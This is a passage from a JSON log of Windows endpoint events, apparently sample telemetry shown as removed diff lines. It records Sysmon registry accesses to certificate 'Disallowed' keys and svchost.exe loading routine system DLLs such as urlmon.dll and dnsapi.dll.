"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ssdpapi.dll", - "image_path": "C:\\Windows\\System32\\ssdpapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - 
"image_name": "gpapi.dll", - "image_path": "C:\\Windows\\System32\\gpapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "bcrypt.dll", - "image_path": "C:\\Windows\\System32\\bcrypt.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "netutils.dll", - "image_path": "C:\\Windows\\System32\\netutils.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - 
"image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", - "registry_value": "Connections", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust 
Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "urlmon.dll", - "image_path": "C:\\Windows\\System32\\urlmon.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878390000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880270000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "dnsapi.dll", - "image_path": "C:\\Windows\\System32\\dnsapi.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880270000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - 
"registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "image_load", - "image_name": "rasadhlp.dll", - "image_path": "C:\\Windows\\System32\\rasadhlp.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570880430000, - "unique_pid": 
"{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880430000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 